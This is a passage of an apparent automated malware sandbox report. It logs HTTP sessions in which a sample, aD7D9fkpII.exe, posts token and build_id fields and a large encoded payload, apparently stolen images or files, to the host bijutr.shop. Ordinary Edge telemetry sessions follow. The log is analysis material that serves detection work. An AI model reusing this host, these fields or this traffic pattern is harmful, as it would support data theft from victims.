                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:58 GMT
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        41192.168.2.549950188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:59 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----VKXT2NYUK6FU3ECBA1VA
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 1821
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:59 UTC1821OUTData Raw: 2d 2d 2d 2d 2d 2d 56 4b 58 54 32 4e 59 55 4b 36 46 55 33 45 43 42 41 31 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 58 54 32 4e 59 55 4b 36 46 55 33 45 43 42 41 31 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 58 54 32 4e 59 55 4b 36 46 55 33 45 43 42 41 31 56 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------VKXT2NYUK6FU3ECBA1VAContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------VKXT2NYUK6FU3ECBA1VAContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------VKXT2NYUK6FU3ECBA1VACont
                                                                                                                                                                                                                                                                        2024-12-27 07:21:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:21:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:21:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        42192.168.2.549955188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:21:00 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----2NG4EUKNOP8QIMG4790R
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 453
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:21:00 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 32 4e 47 34 45 55 4b 4e 4f 50 38 51 49 4d 47 34 37 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 47 34 45 55 4b 4e 4f 50 38 51 49 4d 47 34 37 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 47 34 45 55 4b 4e 4f 50 38 51 49 4d 47 34 37 39 30 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------2NG4EUKNOP8QIMG4790RContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------2NG4EUKNOP8QIMG4790RContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------2NG4EUKNOP8QIMG4790RCont
                                                                                                                                                                                                                                                                        2024-12-27 07:21:01 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:21:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:21:01 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        43192.168.2.549962188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:21:03 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----EUS26XB16P8YM7QQ1VAS
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 98317
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:21:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 55 53 32 36 58 42 31 36 50 38 59 4d 37 51 51 31 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 45 55 53 32 36 58 42 31 36 50 38 59 4d 37 51 51 31 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 45 55 53 32 36 58 42 31 36 50 38 59 4d 37 51 51 31 56 41 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------EUS26XB16P8YM7QQ1VASContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------EUS26XB16P8YM7QQ1VASContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------EUS26XB16P8YM7QQ1VASCont
                                                                                                                                                                                                                                                                        2024-12-27 07:21:03 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                                        Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                                        2024-12-27 07:21:03 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                                        Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                                        2024-12-27 07:21:03 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                                        Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                                        2024-12-27 07:21:03 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                                        Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                        2024-12-27 07:21:03 UTC16355OUTData Raw: 62 49 78 42 4f 4e 78 50 4a 78 6e 6a 50 51 64 4b 35 71 34 73 45 66 79 78 4e 6f 31 33 4a 72 69 36 74 48 4a 4c 64 69 31 63 35 69 2b 30 41 67 2b 62 6a 42 51 4a 74 2b 58 4a 78 6a 6f 4e 75 51 66 61 53 44 70 63 39 45 71 43 30 76 49 4c 36 45 7a 57 30 6d 2b 4d 4f 38 5a 4f 43 50 6d 56 69 72 44 6e 30 49 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 38 41 6b 65 68 55 56 7a 2f 67 75 47 65 33 38 4f 72 44 50 45 30 57 79 34 6e 38 74 47 68 61 45 42 50 4d 59 72 68 47 4a 4b 72 6a 47 42 6b 34 47 4b 36 43 68
                                                                                                                                                                                                                                                                        Data Ascii: bIxBONxPJxnjPQdK5q4sEfyxNo13Jri6tHJLdi1c5i+0Ag+bjBQJt+XJxjoNuQfaSDpc9EqC0vIL6EzW0m+MO8ZOCPmVirDn0IIrhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv8AkehUVz/guGe38OrDPE0Wy4n8tGhaEBPMYrhGJKrjGBk4GK6Ch
                                                                                                                                                                                                                                                                        2024-12-27 07:21:03 UTC187OUTData Raw: 6a 41 35 42 42 48 49 49 50 65 75 6c 73 66 48 6d 71 35 65 44 58 35 5a 2f 45 47 6e 53 41 62 37 50 55 4c 6c 33 41 59 66 64 5a 47 4a 4a 52 67 65 34 36 67 6b 48 72 58 4c 55 55 57 41 36 44 55 50 47 2f 69 58 55 66 50 6a 6b 31 71 39 69 74 5a 6c 4d 5a 73 37 65 64 34 37 64 59 79 4d 65 57 73 59 4f 30 4c 6a 6a 47 4f 6c 63 2f 52 52 54 41 4b 75 53 66 38 41 49 46 74 66 2b 76 69 62 2f 77 42 42 6a 71 6e 56 79 54 2f 6b 43 32 76 2f 41 46 38 54 66 2b 67 78 30 41 66 2f 32 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 55 53 32 36 58 42 31 36 50 38 59 4d 37 51 51 31 56 41 53 2d 2d 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: jA5BBHIIPeulsfHmq5eDX5Z/EGnSAb7PULl3AYfdZGJJRge46gkHrXLUUWA6DUPG/iXUfPjk1q9itZlMZs7ed47dYyMeWsYO0LjjGOlc/RRTAKuSf8AIFtf+vib/wBBjqnVyT/kC2v/AF8Tf+gx0Af/2Q==------EUS26XB16P8YM7QQ1VAS--
                                                                                                                                                                                                                                                                        2024-12-27 07:21:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:21:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:21:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        44192.168.2.549972188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:21:06 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----W4OHLXBIEU3EUA1VAASR
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:21:06 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 41 41 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 41 41 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 41 41 53 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------W4OHLXBIEU3EUA1VAASRContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------W4OHLXBIEU3EUA1VAASRContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------W4OHLXBIEU3EUA1VAASRCont
                                                                                                                                                                                                                                                                        2024-12-27 07:21:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:21:07 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:21:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        45192.168.2.549979188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:21:09 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----6X4ECT0ZMOZUAAA1VSRI
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:21:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 34 45 43 54 30 5a 4d 4f 5a 55 41 41 41 31 56 53 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 36 58 34 45 43 54 30 5a 4d 4f 5a 55 41 41 41 31 56 53 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 36 58 34 45 43 54 30 5a 4d 4f 5a 55 41 41 41 31 56 53 52 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------6X4ECT0ZMOZUAAA1VSRIContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------6X4ECT0ZMOZUAAA1VSRIContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------6X4ECT0ZMOZUAAA1VSRICont
                                                                                                                                                                                                                                                                        2024-12-27 07:21:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:21:09 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:21:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        46192.168.2.55005823.219.161.1524437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:21:41 UTC373OUTPOST /api/report?cat=msn HTTP/1.1
                                                                                                                                                                                                                                                                        Host: deff.nelreports.net
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Content-Length: 649
                                                                                                                                                                                                                                                                        Content-Type: application/reports+json
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        2024-12-27 07:21:41 UTC649OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 36 37 30 38 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 35 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 33 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 31 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 32 33 2e 32 30 39 2e 37 32 2e 32 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f
                                                                                                                                                                                                                                                                        Data Ascii: [{"age":46708,"body":{"elapsed_time":350,"method":"GET","phase":"application","protocol":"h3","referrer":"https://ntp.msn.com/","sampling_fraction":0.1,"server_ip":"23.209.72.25","status_code":404,"type":"http.error"},"type":"network-error","url":"https:/
                                                                                                                                                                                                                                                                        2024-12-27 07:21:42 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                        Server: Kestrel
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:21:42 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                                        X-CDN-TraceId: 0.98112317.1735284101.5d7596ac
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        47192.168.2.55005923.219.161.1324437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:21:41 UTC382OUTPOST /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                                                                                                                                                        Host: bzib.nelreports.net
                                                                                                                                                                                                                                                                        Connection: keep-alive
